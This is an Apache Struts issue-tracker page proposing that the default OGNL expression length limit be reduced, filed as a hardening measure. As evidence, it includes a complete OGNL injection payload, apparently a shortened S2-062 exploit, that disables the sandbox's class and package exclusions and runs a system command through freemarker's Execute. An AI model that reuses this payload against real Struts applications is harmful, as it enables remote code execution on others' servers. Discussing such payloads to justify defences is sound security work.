Uploaded image for project: 'Struts 2'
  1. Struts 2
  2. WW-5179

Set 'struts.ognl.expressionMaxLength' to 256 by default

    XMLWordPrintableJSON

Details

    • Improvement
    • Status: Closed
    • Major
    • Resolution: Fixed
    • None
    • 6.0.0
    • Core
    • None

    Description

      struts.ognl.expressionMaxLength

      default set 400

      i reduce the st062 exp

       

      %{(#request.a=#@org.apache.commons.collections.BeanMap@{})+
      (#request.a.setBean(#request.get('struts.valueStack'))==true)+
      (#request.b=#@org.apache.commons.collections.BeanMap@{})+
      (#request.b.setBean(#request.get('a').get('context'))==true)+
      (#request.c=#@org.apache.commons.collections.BeanMap@{})+
      (#request.c.setBean(#request.get('b').get('memberAccess'))==true)+
      (#request.get('c').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
      (#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
      (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc'}))}

       

      it's length is 709, so we default set ognl expression length is 400 could protect our app safe.

       

      and!

       

      i think st2 can give a default num: a expression  can have  #  nums limit like 10

       

      thx

      Attachments

        Issue Links

          Activity

            People

              Unassigned Unassigned
              k4n5ha0 tanli
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved:

                Time Tracking

                  Estimated:
                  Original Estimate - Not Specified
                  Not Specified
                  Remaining:
                  Remaining Estimate - 0h
                  0h
                  Logged:
                  Time Spent - 20m
                  20m